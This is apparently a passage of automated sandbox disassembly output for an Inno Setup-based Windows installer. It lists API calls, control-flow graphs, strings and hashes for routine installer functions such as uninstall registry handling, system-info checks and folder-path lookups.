                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3391052094-3342197833
                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1081 4928c9 1062->1081 1079 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1079 1080 492960-49296d call 403684 1070->1080 1071->1060 1079->1060 1089 4929bc-4929c9 call 403684 1080->1089 1090 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1080->1090 1081->1060 1098 492a18-492a25 call 403684 1089->1098 1099 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1089->1099 1090->1060 1111 492a52-492a5f call 403684 1098->1111 1112 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1098->1112 1099->1060 1127 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1111->1127 1128 492aa0-492aad call 403684 1111->1128 1112->1060 1127->1060 1140 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1128->1140 1141 492af4-492b01 call 403684 1128->1141 1140->1060 1151 492b48-492b55 call 403684 1141->1151 1152 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1141->1152 1162 492baa-492bb7 call 403684 1151->1162 1163 492b57-492b75 call 446ff8 call 42e394 1151->1163 1152->1060 1174 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1162->1174 1175 492c31-492c3e call 403684 1162->1175 1183 492b87-492b95 GetLastError call 447278 1163->1183 1184 492b77-492b85 call 447278 1163->1184 1208 492c21-492c2c call 4470d0 1174->1208 1209 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1174->1209 1189 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1175->1189 1190 492c66-492c73 call 403684 1175->1190 1195 492b9a-492ba5 call 447278 1183->1195 1184->1195 1189->1060 1201 492c98-492ca5 call 403684 1190->1201 1202 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1190->1202 1195->1060 1217 492cdb-492ce8 call 403684 1201->1217 1218 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1201->1218 1202->1060 1208->1060 1209->1060 1227 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1217->1227 1228 492d1e 1217->1228 1218->1060 1227->1060 1228->1060
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1634 483ac8-483acc 1625->1634 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1632 483b29-483b46 1628->1632 1633 483b3d-483b44 1628->1633 1629->1630 1632->1630 1633->1630 1634->1624 1636 483ace-483ad5 call 45271c 1634->1636 1636->1624 1639 483ad7-483ae4 GetProcAddress 1636->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1688 468e84 1668->1688 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1691 468ebb-468ec4 call 4314f8 1671->1691 1692 468ec9-468edb call 42dd4c 1671->1692 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1689 468f16-468f28 call 42dd4c 1674->1689 1690 468f08-468f11 call 4314f8 1674->1690 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1688->1669 1689->1675 1700 468f2a-468f33 call 4314f8 1689->1700 1690->1689 1691->1692 1692->1672 1704 468edd-468ee6 call 4314f8 1692->1704 1700->1675 1704->1672
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                            • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 3771764029-544719455
                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                            • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                            • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                            • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                            • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID: |6B
                                                                                            • API String ID: 183575631-3009739247
                                                                                            • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                            • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                            • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                            • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-256906917
                                                                                            • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                            • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                            • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID: 3A$yA
                                                                                            • API String ID: 3887896539-3278460822
                                                                                            • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                            • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                            APIs
                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
